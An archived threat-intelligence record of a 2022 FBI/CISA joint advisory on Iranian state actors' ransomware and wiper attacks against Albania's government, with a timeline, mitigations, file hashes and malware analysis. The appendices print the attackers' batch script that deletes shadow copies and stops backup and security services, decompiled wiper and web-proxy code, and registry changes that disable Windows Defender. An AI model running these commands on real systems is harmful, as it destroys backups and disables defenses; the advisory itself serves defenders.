{
	"id": "d3bed73f-445b-4a2a-9b33-a5c817d14111",
	"created_at": "2026-04-06T01:31:16.442763Z",
	"updated_at": "2026-04-10T03:31:42.890861Z",
	"deleted_at": null,
	"sha1_hash": "d3da83f7607d8844044a61e4259359be1961ab6f",
	"title": "Iranian State Actors Conduct Cyber Operations Against the Government of Albania | CISA",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 124949,
	"plain_text": "Iranian State Actors Conduct Cyber Operations Against the Government\r\nof Albania | CISA\r\nPublished: 2022-09-23 · Archived: 2026-04-06 00:25:23 UTC\r\nSummary\r\nThe Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing\r\nthis joint Cybersecurity Advisory to provide information on recent cyber operations against the Government of Albania in\r\nJuly and September. This advisory provides a timeline of activity observed, from initial access to execution of encryption\r\nand wiper attacks. Additional information concerning files used by the actors during their exploitation of and cyber attack\r\nagainst the victim organization is provided in Appendices A and B.\r\nIn July 2022, Iranian state cyber actors—identifying as “HomeLand Justice”—launched a destructive cyber attack against\r\nthe Government of Albania which rendered websites and services unavailable. An FBI investigation indicates Iranian state\r\ncyber actors acquired initial access to the victim’s network approximately 14 months before launching the destructive cyber\r\nattack, which included a ransomware-style file encryptor and disk wiping malware. The actors maintained continuous\r\nnetwork access for approximately a year, periodically accessing and exfiltrating e-mail content.\r\nBetween May and June 2022, Iranian state cyber actors conducted lateral movement, network reconnaissance, and\r\ncredential harvesting from Albanian government networks. In July 2022, the actors launched ransomware on the networks,\r\nleaving an anti-Mujahideen E-Khalq (MEK) message on desktops. When network defenders identified and began to respond\r\nto the ransomware activity, the cyber actors deployed a version of ZeroCleare destructive malware.\r\nIn June 2022, HomeLand Justice created a website and multiple social media profiles posting anti-MEK messages. 
On July\r\n18, 2022, HomeLand Justice claimed credit for the cyber attack on Albanian government infrastructure. On July 23, 2022,\r\nHomeLand Justice posted videos of the cyber attack on their website. From late July to mid-August 2022, social media\r\naccounts associated with HomeLand Justice demonstrated a repeated pattern of advertising Albanian Government\r\ninformation for release, posting a poll asking respondents to select the government information to be released by HomeLand\r\nJustice, and then releasing that information—either in a .zip file or a video of a screen recording with the documents shown.\r\nIn September 2022, Iranian cyber actors launched another wave of cyber attacks against the Government of Albania, using\r\nTTPs and malware similar to those used in the cyber attacks in July. These were likely done in retaliation for public attribution of the\r\ncyber attacks in July and the severing of diplomatic ties between Albania and Iran.\r\nDownload the PDF version of this report: pdf, 1221 kb\r\nDownload the STIX file: pdf, 44 KB\r\nTechnical Details\r\nInitial access\r\nTimeframe: Approximately 14 months before encryption and wiper attacks.\r\nDetails: Initial access was obtained via exploitation of an Internet-facing Microsoft SharePoint, exploiting CVE-2019-0604.\r\nPersistence and lateral movement\r\nTimeframe: Several days to two months after initial compromise.\r\nDetails: After obtaining access to the victim environment, the actors used several .aspx webshells, pickers.aspx,\r\nerror4.aspx, and ClientBin.aspx, to maintain persistence. 
During this timeframe, the actors also used RDP (primarily),\r\nhttps://www.cisa.gov/ncas/alerts/aa22-264a\r\nPage 1 of 12\n\nSMB, and FTP for lateral movement throughout the victim environment.\r\nExchange Server compromise\r\nTimeframe: Approximately 1-6 months after initial compromise.\r\nDetails: The actors used a compromised Microsoft Exchange account to run searches (via CmdLets New-MailboxSearch\r\nand Get-Recipient) on various mailboxes, including for administrator accounts. In this timeframe, the actors used the\r\ncompromised account to create a new Exchange account and add it to the Organization Management role group.\r\nLikely Email exfiltration\r\nTimeframe: Approximately 8 months after initial compromise.\r\nDetails: The actors made thousands of HTTP POST requests to Exchange servers of the victim organization. The FBI\r\nobserved the client transferring roughly 70-160 MB of data, and the server transferring roughly 3-20 GB of data.\r\nVPN activity\r\nTimeframe: Approximately 12-14 months after initial compromise.\r\nDetails: Approximately twelve months after initial access and two months before launching the destructive cyber attack, the\r\nactors made connections to IP addresses belonging to the victim organization’s Virtual Private Network (VPN) appliance.\r\nThe actors’ activity primarily involved two compromised accounts. The actors executed the “Advanced Port Scanner”\r\n(advanced_port_scanner.exe). The FBI also found evidence of Mimikatz usage and LSASS dumping.\r\nFile Cryptor (ransomware-style file encryptor)\r\nTimeframe: Approximately 14 months after initial compromise.\r\nDetails: For the encryption component of the cyber attack, the actor logged in to a victim organization print server via RDP\r\nand kicked off a process (Mellona.exe) which would propagate the GoXml.exe encryptor to a list of internal machines, along\r\nwith a persistence script called win.bat. 
As deployed, GoXML.exe encrypted all files (except those having extensions .exe,\r\n.dll, .sys, .lnk, or .lck) on the target system, leaving behind a ransom note titled How_To_Unlock_MyFiles.txt in each folder\r\nimpacted.\r\nWiper attack\r\nTimeframe: Approximately 14 months after initial compromise.\r\nDetails: In the same timeframe as the encryption attack, the actors began actions that resulted in raw disk drives being\r\nwiped with the Disk Wiper tool (cl.exe) described in Appendix A. Over approximately the next eight hours, numerous RDP\r\nconnections were logged from an identified victim server to other hosts on the victim’s network. Command line execution of\r\ncl.exe was observed in cached bitmap files from these RDP sessions on the victim server.\r\nMitigations\r\nFBI and CISA recommend organizations apply the following best practices to reduce the risk of compromise:\r\nEnsure anti-virus and anti-malware software is enabled and signature definitions are updated regularly and in\r\na timely manner. Well-maintained anti-virus software may prevent use of commonly deployed cyber attacker tools\r\nthat are delivered via spear-phishing.\r\nAdopt threat reputation services at the network device, operating system, application, and email service levels.\r\nReputation services can be used to detect or prevent low-reputation email addresses, files, URLs, and IP addresses\r\nused in spear-phishing attacks.\r\nIf your organization is employing certain types of software and appliances vulnerable to known Common\r\nVulnerabilities and Exposures (CVEs), ensure those vulnerabilities are patched. Prioritize patching known\r\nexploited vulnerabilities.\r\nMonitor for unusually large amounts of data (i.e. 
several GB) being transferred from a Microsoft Exchange server.\r\nCheck the host-based indications, including webshells, for positive hits within your environment.\r\nMaintain and test an incident response plan.\r\nEnsure your organization has a vulnerability management program in place and that it prioritizes patch\r\nmanagement and vulnerability scanning of known exploited vulnerabilities. Note: CISA’s Cyber Hygiene Services\r\n(CyHy) are free to all state, local, tribal, and territorial (SLTT) organizations, as well as public and private sector\r\ncritical infrastructure organizations.\r\nProperly configure and secure internet-facing network devices.\r\nDo not expose management interfaces to the internet.\r\nDisable unused or unnecessary network ports and protocols.\r\nDisable/remove unused network services and devices.\r\nAdopt zero-trust principles and architecture, including:\r\nMicro-segmenting networks and functions to limit or block lateral movements.\r\nEnforcing phishing-resistant multifactor authentication (MFA) for all users and VPN connections.\r\nRestricting access to trusted devices and users on the networks.\r\nFor more information on Iranian government-sponsored malicious cyber activity, see CISA's webpage – Iran Cyber Threat\r\nOverview and Advisories.\r\nAppendix A\r\nHost-based IOCs\r\nAdditional details concerning some of these files are provided in Appendix B.\r\nFile MD5 Hash Notes\r\nError4.aspx 81e123351eb80e605ad73268a5653ff3 Webshell\r\ncl.exe 7b71764236f244ae971742ee1bc6b098 Wiper\r\nGoXML.exe bbe983dba3bf319621b447618548b740 Encryptor\r\nGoxml.jpg 0738242a521bdfe1f3ecc173f1726aa1  \r\nClientBin.aspx a9fa6cfdba41c57d8094545e9b56db36 Webshell (reverse-proxy connections)\r\nPickers.aspx 8f766dea3afd410ebcd5df5994a3c571 Webshell\r\nevaluatesiteupgrade.cs.aspx Unknown Webshell\r\nmellona.exe 78562ba0069d4235f28efd01e3f32a82 Propagation for Encryptor\r\nwin.bat 1635e1acd72809479e21b0ac5497a79b Launches GoXml.exe on startup\r\nwin.bat 
18e01dee14167c1cf8a58b6a648ee049\r\nChanges desktop background to encryption\r\nimage\r\nbb.bat 59a85e8ec23ef5b5c215cd5c8e5bc2ab\r\nSaves SAM and SYSTEM hives to C:\\Temp,\r\nmakes cab archive\r\ndisable_defender.exe 60afb1e62ac61424a542b8c7b4d2cf01 Disables Windows Defender\r\nrwdsk.sys 8f6e7653807ebb57ecc549cef991d505 Raw disk driver utilized by wiper malware\r\nApp_Web_bckwssht.dll e9b6ecbf0783fa9d6981bba76d949c94  \r\nhttps://www.cisa.gov/ncas/alerts/aa22-264a\r\nPage 3 of 12\n\nNetwork-based IOCs\r\nFBI review of Commercial VPN service IP addresses revealed the following resolutions (per Akamai data):\r\nCountry Company\r\nAL KEMINET LTD.\r\nDE NOOP-84-247-59-0-25\r\nDE GSL NETWORKS\r\nGB LON-CLIENTS\r\nGB GB-DATACENTER\r\nNL NL-LAYERSWITCH-20190220\r\nNL PANQ-45-86-200-0\r\nUS PRIVATE CUSTOMER\r\nUS BANDITO NETWORKS\r\nUS EXTERNAL\r\nUS RU-SELENA-20080725\r\nUS TRANS OCEAN NETWORK\r\nAppendix B\r\nRansomware Cryptor\r\nGoXML.exe is a ransomware style file encryptor. It is a Windows executable, digitally signed with a certificate issued to the\r\nKuwait Telecommunications Company KSC, a subsidiary of Saudi Telecommunications Company (STC).\r\nIf executed with five or more arguments (the arguments can be anything, as long as there are five or more), the program\r\nsilently engages its file encryption functionality. Otherwise, a file-open dialog Window is presented, and any opened\r\ndocuments receive an error prompt labeled, Xml Form Builder.\r\nAll internal strings are encrypted with a hard coded RC4 key. Before internal data is decrypted, the string decryption routine\r\nhas a built-in self-test that decrypts a DWORD value and tests to see if the plaintext is the string yes . 
If so, it will continue\r\nto decode its internal strings.\r\nThe ransomware will attempt to launch the following batch script; however, this will fail due to a syntax error.\r\n@for /F \"skip=1\" %C in ('wmic LogicalDisk get DeviceID') do (@wmic /namespace:\\\\root\\default Path SystemRestore Call\r\ndisable \"%C\\\" \u0026 @rd /s /q %C\\$Recycle.bin)\r\n@vssadmin.exe delete shadows /all /quiet\r\n@set SrvLst=vss sql svc$ memtas mepos sophos veeam backup GxVss GxBlr GxFWD GxCVD GxCIMgr DefWatch\r\nccEvtMgr ccSetMgr SavRoam RTVscan QBFCService QBIDPService ntuit.QuickBooks.FCS QBCFMonitorService\r\nYooBackup YooIT zhudongfangyu sophos stc_raw_agent VSNAPVSS VeeamTransportSvc VeeamDeploymentService\r\nVeeamNFSSvc veeam PDVFSService BackupExecVSSProvider BackupExecAgentAccelerator BackupExecAgentBrowser\r\nBackupExecDiveciMediaService BackupExecJobEngine BackupExecManagementService BackupExecRPCService\r\nAcrSch2Svc AcronisAgent CASAD2DWebSvc CAARCUpdateSvc\r\nhttps://www.cisa.gov/ncas/alerts/aa22-264a\r\nPage 4 of 12\n\n@for %C in (%SrvLst%) do @net stop %C\r\n@set SrvLst=\r\n@set PrcLst=mysql sql oracle ocssd dbsnmp synctime agntsvc isqlplussvc xfssvccon mydesktopservice ocautoupds encsvc\r\ntbirdconfig mydesktopqos ocomm dbeng50 sqbcoreservice excel infopath msaccess mspub onenote outlook powerpnt steam\r\nthebat thunderbird visio winword wordpad notepad\r\n@for %C in (%PrcLst%) do @taskkill /f /im \"%C.exe\"\r\n@set PrcLst=\r\n@exit\r\nThe syntax error consists of a missing backslash that separates system32 and cmd.exe , so the process is launched as\r\nsystem32cmd.exe which is an invalid command.\r\nScript Launch Bug\r\nThe ransomware’s file encryption routine will generate a random string, take the MD5 hash and use that to generate an RC4\r\n128 key which is used to encrypt files. This key is encrypted with a hard coded Public RSA key and converted to Base64\r\nutilizing a custom alphabet. 
This is appended to the end of the ransom note.\r\nThe cryptor places a file called How_To_Unlock_MyFiles.txt in directories with encrypted files.\r\nEach encrypted file is given the .lck extension and the contents of each file are only encrypted up to 0x100000 or\r\n1,048,576 bytes which is a hard coded limit.\r\nSeparately, the actor ran a batch script (win.bat below) to set a specific desktop background.\r\nFile Details\r\nGoXml.exe\r\nFile Size: 43.48 KB (44520 bytes)\r\nSHA256: f116acc6508843f59e59fb5a8d643370dce82f492a217764521f46a856cc4cb5\r\nSHA1: 5d117d8ef075f3f8ed1d4edcc0771a2a0886a376\r\nMD5: bbe983dba3bf319621b447618548b740\r\nSSDeep:\r\n768:+OFu8Q3w6QzfR5Jni6SQD7qSFDs6P93/q0XIc/UB5EPABWX\r\n:RFu8QAFzffJui79f13/AnB5EPAkX (Ver 1.1)\r\nFile Type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows\r\nPE Header\r\nTimestamp:\r\n2016-04-30 17:08:19\r\nImpHash: 5b2ce9270beea5915ec9adbcd0dbb070\r\nCert #0 Subject C=KW, L=Salmiya, O=Kuwait Telecommunications Company KSC, OU=Kuwait Telecommunications\r\nCompany, CN=Kuwait Telecommunications Company KSC\r\nCert #0 Issuer  C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Assured ID Code Signing CA\r\nhttps://www.cisa.gov/ncas/alerts/aa22-264a\r\nPage 5 of 12\n\nCert #0 SHA1    55d90ec44b97b64b6dd4e3aee4d1585d6b14b26f\r\nwin.bat (#1, run malware)\r\nFile Size: 67 bytes\r\nSHA256: bad65769c0b416bb16a82b5be11f1d4788239f8b2ba77ae57948b53a69e230a6\r\nSHA1: 14b8c155e01f25e749a9726958606b242c8624b9\r\nMD5: 1635e1acd72809479e21b0ac5497a79b\r\nSSDeep: 3:LjTFKCkRErG+fyM1KDCFUF82G:r0aH1+DF82G (Ver 1.1)\r\nFile Type: ASCII text, with no line terminators\r\nContents: start /min C:\\ProgramData\\Microsoft\\Windows\\GoXml.exe 1 2 3 4 5 6 7\r\nwin.bat (#2, install desktop image)\r\nFilename: ec4cd040fd14bff86f6f6e7ba357e5bcf150c455532800edf97782836e97f6d2\r\nFile Size: 765 bytes\r\nSHA256: ec4cd040fd14bff86f6f6e7ba357e5bcf150c455532800edf97782836e97f6d2\r\nSHA1: 
fce0db6e66d227d3b82d4564446ede0c0fd7598c\r\nMD5: 18e01dee14167c1cf8a58b6a648ee049\r\nSSDeep:\r\n12:wbYVJ69/TsdLd6sdLd3mTDwfV+EVTCuwfV+EVTCuwfV+EVTCuwfV+EVTCuwfV\r\n+Et:wq69/kZxZ3mTDY9HY9HY9HY9HY9j (Ver 1.1)\r\nFile Type: DOS batch file text, ASCII text, with CRLF line terminators\r\nContents:\r\n@echo off\r\nsetlocal enabledelayedexpansion\r\nset \"Wtime=!time:~0,2!\"\r\nif \"!Wtime!\" leq \"20\" reg add \"HKEY_CURRENT_USER\\Control Panel\\Desktop\" /v Wallpaper /t REG_SZ /d\r\n\"c:\\programdata\\GoXml.jpg\" /f \u0026 goto done\r\nif \"!Wtime!\" geq \"20\" reg add \"HKEY_CURRENT_USER\\Control Panel\\Desktop\" /v Wallpaper /t REG_SZ /d\r\n\"c:\\programdata\\GoXml.jpg\" /f \u0026 goto done\r\n:done\r\ntimeout /t 5 \u003enul\r\nstart \"\" /b RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters ,1 ,True\r\nstart \"\" /b RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters ,1 ,True\r\nstart \"\" /b RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters ,1 ,True\r\nhttps://www.cisa.gov/ncas/alerts/aa22-264a\r\nPage 6 of 12\n\nstart \"\" /b RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters ,1 ,True\r\nstart \"\" /b RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters ,1 ,True\r\nendlocal\r\ngoxml.jpg\r\nFile Size: 1.2 MB (1259040 bytes)\r\nSHA256: 63dd02c371e84323c4fd9a161a75e0f525423219e8a6ec1b95dd9eda182af2c9\r\nSHA1: 683eaec2b3bb5436f00b2172e287dc95e2ff2266\r\nMD5: 0738242a521bdfe1f3ecc173f1726aa1\r\nSSDeep:\r\n12288:ME0p1RE70zxntT/ylTyaaSMn2fS+0M6puxKfJbDKrCxMe5fPSC2tmx\r\nVjpJT/n37p:MHyUt7yQaaPXS6pjar+MwrjpJ7VIbZg (Ver 1.1)\r\nFile Type:\r\nJPEG image data, Exif standard: [TIFF image data, big-endian, direntries=13, height=1752, bps=0,\r\nPhotometricIntepretation=CMYK, orientation=upper-left, width=2484TIFF image data, big-endian,\r\ndirentries=13, height=1752, bps=0, PhotometricIntepretation=CMYK, orientation=upper-left,\r\nwidth=2484], progressive, precision 8, 2484x1752, components 4\r\nSoftware: Adobe Photoshop 22.4 
(Windows)\r\nModify\r\nDate:\r\n2022-07-13 20:45:20\r\nCreate\r\nDate:\r\n2020-06-11 02:13:33\r\nMetadata\r\nDate:\r\n2022-07-13 20:45:20\r\nProfile\r\nDate\r\nTime:\r\n2000-07-26 05:41:53\r\nImage\r\nSize:\r\n2484x1752\r\nFile Size: 1.2 MB (1259040 bytes)\r\nSHA256: 63dd02c371e84323c4fd9a161a75e0f525423219e8a6ec1b95dd9eda182af2c9\r\nDisk Wiper\r\nThe files cl.exe and rwdsk.sys are part of a disk wiper utility that provides raw access to the hard drive for the purposes\r\nof wiping data. From the command line the cl.exe file accepts the arguments:\r\nin\r\nun\r\nwp \u003coptional argument\u003e\r\nhttps://www.cisa.gov/ncas/alerts/aa22-264a\r\nPage 7 of 12\n\nIf executed with the in command, the utility will output in start! and installs a hard coded file named rwdsk.sys as a\r\nservice named RawDisk3 . The .SYS file is not extracted from the installer however, but rather the installer looks for the\r\nfile in the same directory that the cl.exe is executed in. \r\nIt will also load the driver after installation.\r\nThe un command uninstalls the service, outputting the message “un start!” to the terminal.\r\nThe wp command will access the loaded driver for raw disk access.\r\nRaw Disk Access\r\nThe long hexadecimal string is hard coded in the cl.exe binary.\r\n      RawDisk3File = (void *)toOpenRawDisk3File(\r\n                               arg2_WideCharStr,\r\n                               0xC0000000,\r\n                               L\"B4B615C28CCD059CF8ED1ABF1C71FE03C0354522990AF63ADF3C911E2287A4B906D47D\");\r\n      ptrRawDiskFile = RawDisk3File;\r\n      if ( RawDisk3File )\r\n      {\r\n        sizeDisk = toGetDiskSize(RawDisk3File);\r\n        terminal_out(\"Total Bytez : %lld\\n\", sizeDisk \u003c\u003c 9);\r\nThe wp command also takes an additional argument as a device path to place after \\RawDisk3\\ in the output string. 
It is\r\nuncertain what creates this path to a device as the driver tested did not.\r\nThe output is “wp starts!” followed by the total bytes of the drive and the time the wipe operation takes.\r\nIf the registry key value HKLM\\SOFTWARE\\EldoS\\EventLog is set to “Enabled”, the install will generate an event log if at\r\nany time the install produces an error. This log contains an error code DWORD followed by the string\r\n..\\..\\DriverLibraries\\DrvSupLib\\install.c. If the system does not have the SOFTWARE\\EldoS key, no event logs would be\r\nproduced. This feature must be a related to the legitimate EldoS utility. \r\nrwdsk.sys is a “legitimate commercial driver from the EldoS Corporation that is used for interacting with files, disks, and\r\npartitions. The driver allows for direct modification of data on a local computer’s hard drive. In some cases, the tool can\r\nenact these raw disk modifications from user-mode processes, circumventing Windows operating system security\r\nfeatures.\"https://attack.mitre.org/software/S0364/\r\nFile Details\r\ncl.exe  \r\nFile Size 142.5 KB (145920 bytes)\r\nSHA256 e1204ebbd8f15dbf5f2e41dddc5337e3182fc4daf75b05acc948b8b965480ca0\r\nSHA1 f22a7ec80fbfdc4d8ed796119c76bfac01e0a908\r\nMD5 7b71764236f244ae971742ee1bc6b098\r\nSSDeep 3072:vv2ADi7yOcE/YMBSZ0fZX4kpK1OhJrDwM:vv2jeQ/flfZbKM (Ver 1.1)\r\nhttps://www.cisa.gov/ncas/alerts/aa22-264a\r\nPage 8 of 12\n\nFiletype PE32+ executable (console) x86-64, for MS Windows\r\nPE Header Timestamp 2022-07-15 13:26:28\r\nImpHash 58d51c1152817ca3dec77f2eee52cbef\r\nrwdsk.sys  \r\nFile Size 38.84 KB (39776 bytes)\r\nSHA256 3c9dc8ada56adf9cebfc501a2d3946680dcb0534a137e2e27a7fcb5994cd9de6\r\nSHA1 5e061701b14faf9adec9dd0b2423ff3cfc18764b\r\nMD5 8f6e7653807ebb57ecc549cef991d505\r\nSSDeep 768:E31ySCpoCbXnfDbEaJSooKIDyE9aBazWlEAusxsia:0gyCb3MFKIHO4Ausxta (Ver 1.1)\r\nFiletype PE32+ executable (native) x86-64, for MS Windows\r\nPEtype Driver\r\nPE Header\r\nTimestamp\r\n2016-03-18 
14:44:54\r\nImpHash e233f2cdc91faafe1467d9e52f166213\r\nCert #0\r\nSubject\r\nCN=VeriSign Time Stamping Services CA, O=VeriSign, Inc., C=US\r\nCert #0\r\nIssuer\r\nCN=VeriSign Time Stamping Services CA, O=VeriSign, Inc., C=US\r\nCert #0\r\nSHA1\r\n382c18388fb326221dfd7a77ee874f9ba60e04bf\r\nCert #1\r\nSubject\r\nC=US, ST=California, L=SANTA CLARA, O=NVIDIA Corporation, CN=NVIDIA Corporation\r\nCert #1\r\nIssuer\r\nC=US, O=VeriSign, Inc., OU=VeriSign Trust Network, OU=Terms of use at\r\nhttps://www.verisign.com/rpa (c)10, CN=VeriSign Class 3 Code Signing 2010 CA\r\nCert #1\r\nSHA1\r\n30632ea310114105969d0bda28fdce267104754f\r\nCert #2\r\nSubject\r\nC=US, O=VeriSign, Inc., OU=VeriSign Trust Network, OU=(c) 2006 VeriSign, Inc. - For authorized\r\nuse only, CN=VeriSign Class 3 Public Primary Certification Authority - G5\r\nCert #2\r\nIssuer\r\nC=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Code Verification\r\nRoot\r\nCert #2\r\nSHA1\r\n57534ccc33914c41f70e2cbb2103a1db18817d8b\r\nCert #3\r\nSubject\r\nC=US, O=VeriSign, Inc., OU=VeriSign Trust Network, OU=Terms of use at\r\nhttps://www.verisign.com/rpa (c)10, CN=VeriSign Class 3 Code Signing 2010 CA\r\nCert #3\r\nIssuer\r\nC=US, O=VeriSign, Inc., OU=VeriSign Trust Network, OU=(c) 2006 VeriSign, Inc. - For authorized\r\nuse only, CN=VeriSign Class 3 Public Primary Certification Authority - G5\r\nhttps://www.cisa.gov/ncas/alerts/aa22-264a\r\nPage 9 of 12\n\nCert #3\r\nSHA1\r\n495847a93187cfb8c71f840cb7b41497ad95c64f\r\nAdditional Files\r\nWeb Deployed Reverse Proxy\r\nDescription\r\nClientBin.aspx is an ASP file that contains a Base64 encoded .Net executable (App_Web_bckwssht.dll) that it decodes and\r\nloads via Reflection. 
The .Net executable contains Class and Method obfuscation and internal strings are encoded with a\r\nsingle byte XOR obfuscation.\r\npublic static string hair_school_bracket()\r\n        {\r\n            return\r\nUmbrella_admit_arctic.rebel_sadreporthospital(\"460F2830272A2F2266052928202F21661627252D27212368\");  //Invalid\r\nConfig Package.\r\n        }\r\npublic static string Visual_math_already()\r\n        {\r\n       return Umbrella_admit_arctic.rebel_sadreporthospital(\"5304057E0116001607\");   //WV-RESET\r\nThe method rebel_sadreporthospital takes the first byte of the encoded string and XOR’s each subsequent byte to produce\r\nthe de-obfuscated string.\r\nWhen run in context of an IIS web server connecting to the ASPX file will generate a 200 \u003cEncryption DLL Info\u003e 1.5\r\noutput.\r\n \r\nInitial connection\r\nThe hex string represents the following ASCII text:\r\nBase64, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null\r\nSending a POST request with a Base64 encoded IP and port will open a second socket to the supplied IP and port making\r\nthis a Web proxy. \r\nSecond Socket Opened from POST Request\r\nSending a request to WV-RESET with a value will produce an OK response and call a function to shut down the proxy\r\nsocket.\r\nTerminate socket\r\nThe DLL extracts a secondary “EncryptionDLL” named Base64.dll which is loaded via Assembly.Load. This exposes two\r\nfunctions, encrypt and decrypt. This DLL is used to decrypt the Proxy IP and port along with data. In this instance the class\r\nname is misspelled Bsae64, which is also reflected in the calling DLLs decoded strings. It is uncertain as to why an\r\nadditional Base64.dll binary is extracted when the same encoding could be hard coded in the original DLL. 
It is possible\r\nother versions of this tool utilize differing “EncryptionDLL” binaries.\r\n \r\nMisspelled Class Name\r\nhttps://www.cisa.gov/ncas/alerts/aa22-264a\r\nPage 10 of 12\n\nCalled Misspelled Name\r\nFile Details\r\nClientBin.aspx  \r\nFile Size 55.24 KB (56561 bytes)\r\nSHA256 7ad64b64e0a4e510be42ba631868bbda8779139dc0daad9395ab048306cc83c5\r\nSHA1 e03edd9114e7a0138d1309034cad6b461ab0035b\r\nMD5 a9fa6cfdba41c57d8094545e9b56db36\r\nSSDeep\r\n768:x9TfK6nOgo5zE/cezUijAwZIFxK1mGjncrF8EAZ0iBDZBZdywb0DwHN4N4wjMxr8:x9TfdOgAi2\r\n(Ver 1.1)\r\nFiletype HTML document text, ASCII text, with very long lines (56458)\r\nApp_Web_bckwssht.dll  \r\nFile Size 41.0 KB (41984 bytes)\r\nSHA256 cad2bc224108142b5aa19d787c19df236b0d12c779273d05f9b0298a63dc1fe5\r\nSHA1 49fd8de33aa0ea0c7432d62f1ddca832fab25325\r\nMD5 e9b6ecbf0783fa9d6981bba76d949c94\r\nSSDeep\r\n384:coY4jnD7l9VAk1dtrGBlLGYEX1tah8dgNyamGOvMTfdYN5qZAsP:hlXAkHRGBlUUh8cFmpv6fe\r\n(Ver 1.1)\r\nFiletype PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows\r\nPEtype DLL\r\nPE Header Timestamp 2021-06-07 10:37:55\r\nImpHash dae02f32a21e03ce65412f6e56942daa\r\nDisable Defender\r\nDescription\r\ndisable_defender.exe is a Microsoft Windows PE file that attempts to disable Windows Defender. The application will\r\nelevate privileges to that of SYSTEM and then attempt to disable Defender’s core functions. A command prompt with status\r\nand error messages is displayed as the application executes. No network activity was detected during the evaluation.\r\nUpon execution, a command prompt is launched and a message is displayed if the process is not running as SYSTEM. 
The\r\nprocess is then restarted with the required permissions.\r\nTest validate permissions\r\nThe application will attempt to terminate the Windows Defender process by calling TerminateProcess for smartscreen.exe:\r\nAttempt to kill Windows Defender\r\nThe following Registry Keys were modified to disable Windows Defender:\r\nSet Registry Values (observed Win10 1709)  \r\nhttps://www.cisa.gov/ncas/alerts/aa22-264a\r\nPage 11 of 12\n\nHKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Features\\TamperProtection  0 \r\n   \r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\r\nDefender\\DisableAntiSpyware \r\n1 \r\nHKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\\r\nStartupApproved\\Run\\SecurityHealth \r\n03 00 00 00 5D 02 00 00 41 3B 47\r\n9D \r\nHKLM\\SOFTWARE\\Microsoft\\Windows Defender\\DisableAntiSpyware  1 \r\nHKLM\\System\\CurrentControlSet\\Services\\WinDefend\\Start  3 \r\nHKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Real-Time Protection\\\r\nDisableRealtimeMonitoring \r\n1 \r\nUpon completion and if successful the application will display the following messages and wait for user input.\r\nUser Input\r\ndisable-defender.exe  \r\nFile Size 292.0 KB (299008 bytes)\r\nSHA256 45bf0057b3121c6e444b316afafdd802d16083282d1cbfde3cdbf2a9d0915ace\r\nSHA1 e866cc6b1507f21f688ecc2ef15a64e413743da7\r\nMD5 60afb1e62ac61424a542b8c7b4d2cf01\r\nSSDeep 6144:t2WhikbJZc+Wrbe/t1zT/p03BuGJ1oh7ISCLun:t2WpZnW+/tVoJ1ouQ (Ver 1.1)\r\nFiletype PE32+ executable (console) x86-64, for MS Windows\r\nPEtype EXE\r\nPE Header Timestamp 2021-10-24 15:07:32\r\nImpHash 74a6ef9e7b49c71341e439022f643c8e\r\nRevisions\r\nSeptember 21, 2022: Initial Version|September 22, 2022: Reordered items in the Mitigation Section|September 23, 2022:\r\nAdd the STIX file\r\nSource: https://www.cisa.gov/ncas/alerts/aa22-264a\r\nhttps://www.cisa.gov/ncas/alerts/aa22-264a\r\nPage 12 of 12",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://www.cisa.gov/ncas/alerts/aa22-264a"
	],
	"report_names": [
		"aa22-264a"
	],
	"threat_actors": [
		{
			"id": "7f25e108-e694-49b6-a494-c8458b33eb3f",
			"created_at": "2024-01-09T02:00:04.199217Z",
			"updated_at": "2026-04-10T02:00:03.509338Z",
			"deleted_at": null,
			"main_name": "HomeLand Justice",
			"aliases": [],
			"source_name": "MISPGALAXY:HomeLand Justice",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "20c759c2-cd02-45bb-85c6-41bde9e6a7cf",
			"created_at": "2024-01-18T02:02:34.189827Z",
			"updated_at": "2026-04-10T02:00:04.721082Z",
			"deleted_at": null,
			"main_name": "HomeLand Justice",
			"aliases": [
				"Banished Kitten",
				"Karma",
				"Red Sandstorm",
				"Storm-0842",
				"Void Manticore"
			],
			"source_name": "ETDA:HomeLand Justice",
			"tools": [
				"BABYWIPER",
				"BiBi Wiper",
				"BiBi-Linux Wiper",
				"BiBi-Windows Wiper",
				"Cl Wiper",
				"LowEraser",
				"No-Justice Wiper",
				"Plink",
				"PuTTY Link",
				"RevSocks",
				"W2K Res Kit"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "b3ebf51d-8f64-48a9-bbfb-674db872cccb",
			"created_at": "2025-08-07T02:03:24.769383Z",
			"updated_at": "2026-04-10T02:00:03.860954Z",
			"deleted_at": null,
			"main_name": "COBALT MYSTIQUE",
			"aliases": [
				"Banished Kitten ",
				"DEV-0842 ",
				"Druidfly ",
				"Handala Hack Team",
				"Homeland Justice",
				"Karmabelow80",
				"Red Sandstorm ",
				"Storm-0842 ",
				"Void Manticore "
			],
			"source_name": "Secureworks:COBALT MYSTIQUE",
			"tools": [
				"AllinOneNeo",
				"Bibi",
				"GramPy",
				"GramPyLoader"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775439076,
	"ts_updated_at": 1775791902,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d3da83f7607d8844044a61e4259359be1961ab6f.pdf",
		"text": "https://archive.orkl.eu/d3da83f7607d8844044a61e4259359be1961ab6f.txt",
